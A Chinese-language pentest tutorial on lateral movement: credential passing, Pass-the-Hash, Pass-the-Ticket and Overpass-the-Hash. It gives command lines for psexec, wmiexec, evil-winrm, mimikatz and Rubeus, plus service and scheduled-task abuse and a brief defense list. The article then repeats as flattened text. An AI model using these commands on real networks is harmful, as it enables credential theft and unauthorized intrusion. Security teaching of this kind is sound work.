内网横向渗透之各种传递攻击技术详解

一、前言

内网横向渗透是渗透测试中的关键环节，攻击者在获取初始立足点后，需要通过各种技术手段在内网中横向移动，扩大控制范围。传递攻击是横向渗透的核心技术，主要包括明文凭证传递和哈希值传递两大类。

二、准备工作

在进行横向渗透前，必须完成以下准备工作：

已完成内网信息收集，掌握目标网络拓扑
已获取至少一台内网主机的控制权限
已收集到部分用户凭证或哈希值
已搭建好攻击环境（如Cobalt Strike、Metasploit等）

三、明文凭证传递攻击

1. SMB协议明文传递

适用场景：获取了域用户的明文密码

攻击方法：

# 使用psexec工具
psexec.exe \\目标IP -u 用户名 -p 密码 cmd.exe

# 使用wmiexec工具
wmiexec.py 用户名:密码@目标IP "命令"

# 使用smbexec工具
smbexec.py 用户名:密码@目标IP

2. RDP协议明文传递

适用场景：目标主机开启了远程桌面服务

攻击方法：

# 使用xfreerdp工具
xfreerdp /u:用户名 /p:密码 /v:目标IP

# 使用rdesktop工具
rdesktop -u 用户名 -p 密码 目标IP

3. WinRM协议明文传递

适用场景：目标主机开启了WinRM服务(5985/5986端口)

攻击方法：

# 使用evil-winrm工具
evil-winrm -i 目标IP -u 用户名 -p 密码

# 使用PowerShell命令
$cred = New-Object System.Management.Automation.PSCredential("用户名", (ConvertTo-SecureString "密码" -AsPlainText -Force))
Invoke-Command -ComputerName 目标IP -Credential $cred -ScriptBlock {命令}

四、哈希值传递攻击

1. Pass-the-Hash (PtH)攻击

适用场景：获取了用户的NTLM哈希值

攻击方法：

# 使用psexec工具
psexec.exe -hashes LM哈希:NTLM哈希 用户名@目标IP

# 使用wmiexec工具
wmiexec.py -hashes LM哈希:NTLM哈希 用户名@目标IP

# 使用smbexec工具
smbexec.py -hashes LM哈希:NTLM哈希 用户名@目标IP

2. Pass-the-Ticket (PtT)攻击

适用场景：获取了Kerberos票据

攻击方法：

# 使用mimikatz导出票据
mimikatz # sekurlsa::tickets /export

# 注入票据
mimikatz # kerberos::ptt 票据文件

# 使用Rubeus工具
Rubeus.exe ptt /ticket:票据文件

3. Overpass-the-Hash攻击

适用场景：将NTLM哈希转换为Kerberos票据

攻击方法：

# 使用mimikatz
mimikatz # sekurlsa::pth /user:用户名 /domain:域名 /ntlm:NTLM哈希

# 使用Rubeus
Rubeus.exe asktgt /user:用户名 /domain:域名 /rc4:NTLM哈希 /ptt

五、其他传递攻击技术

1. DCOM/WMI横向移动

攻击方法：

$cred = New-Object System.Management.Automation.PSCredential("用户名", (ConvertTo-SecureString "密码" -AsPlainText -Force))
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName 目标IP -Credential $cred

2. 计划任务横向移动

攻击方法：

$action = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c calc.exe"
Register-ScheduledTask -Action $action -TaskName "恶意任务" -User "用户名" -Password "密码" -RunLevel Highest -Force

3. SCM服务控制管理器

攻击方法：

sc.exe \\目标IP create 恶意服务 binPath= "cmd.exe /c calc.exe"
sc.exe \\目标IP start 恶意服务

六、防御措施

禁用NTLM认证：尽可能使用Kerberos认证
启用Credential Guard：防止凭据盗窃
限制管理员权限：遵循最小权限原则
监控异常行为：如大量失败的登录尝试
启用LSA保护：防止mimikatz等工具提取凭据
定期更新补丁：修复已知漏洞

七、工具推荐

CrackMapExec：多功能内网横向移动工具
Impacket：包含多种协议攻击脚本
Mimikatz：凭据提取和传递神器
Rubeus：Kerberos攻击工具
Evil-WinRM：WinRM攻击工具
BloodHound：可视化内网攻击路径

八、总结

内网横向渗透是一个复杂的过程，需要根据目标环境选择合适的传递攻击技术。攻击者通常会结合多种技术进行横向移动，因此防御方也需要采取多层次的安全措施。理解这些攻击技术的原理和实现方式，有助于更好地防御内网渗透攻击。

内网横向渗透之各种传递攻击技术详解一、前言内网横向渗透是渗透测试中的关键环节，攻击者在获取初始立足点后，需要通过各种技术手段在内网中横向移动，扩大控制范围。传递攻击是横向渗透的核心技术，主要包括明文凭证传递和哈希值传递两大类。二、准备工作在进行横向渗透前，必须完成以下准备工作：已完成内网信息收集，掌握目标网络拓扑已获取至少一台内网主机的控制权限已收集到部分用户凭证或哈希值已搭建好攻击环境（如Cobalt Strike、Metasploit等）三、明文凭证传递攻击 1. SMB协议明文传递适用场景：获取了域用户的明文密码攻击方法： 2. RDP协议明文传递适用场景：目标主机开启了远程桌面服务攻击方法： 3. WinRM协议明文传递适用场景：目标主机开启了WinRM服务(5985/5986端口) 攻击方法：四、哈希值传递攻击 1. Pass-the-Hash (PtH)攻击适用场景：获取了用户的NTLM哈希值攻击方法： 2. Pass-the-Ticket (PtT)攻击适用场景：获取了Kerberos票据攻击方法： 3. Overpass-the-Hash攻击适用场景：将NTLM哈希转换为Kerberos票据攻击方法：五、其他传递攻击技术 1. DCOM/WMI横向移动攻击方法： 2. 计划任务横向移动攻击方法： 3. SCM服务控制管理器攻击方法：六、防御措施禁用NTLM认证：尽可能使用Kerberos认证启用Credential Guard ：防止凭据盗窃限制管理员权限：遵循最小权限原则监控异常行为：如大量失败的登录尝试启用LSA保护：防止mimikatz等工具提取凭据定期更新补丁：修复已知漏洞七、工具推荐 CrackMapExec ：多功能内网横向移动工具 Impacket ：包含多种协议攻击脚本 Mimikatz ：凭据提取和传递神器 Rubeus ：Kerberos攻击工具 Evil-WinRM ：WinRM攻击工具 BloodHound ：可视化内网攻击路径八、总结内网横向渗透是一个复杂的过程，需要根据目标环境选择合适的传递攻击技术。攻击者通常会结合多种技术进行横向移动，因此防御方也需要采取多层次的安全措施。理解这些攻击技术的原理和实现方式，有助于更好地防御内网渗透攻击。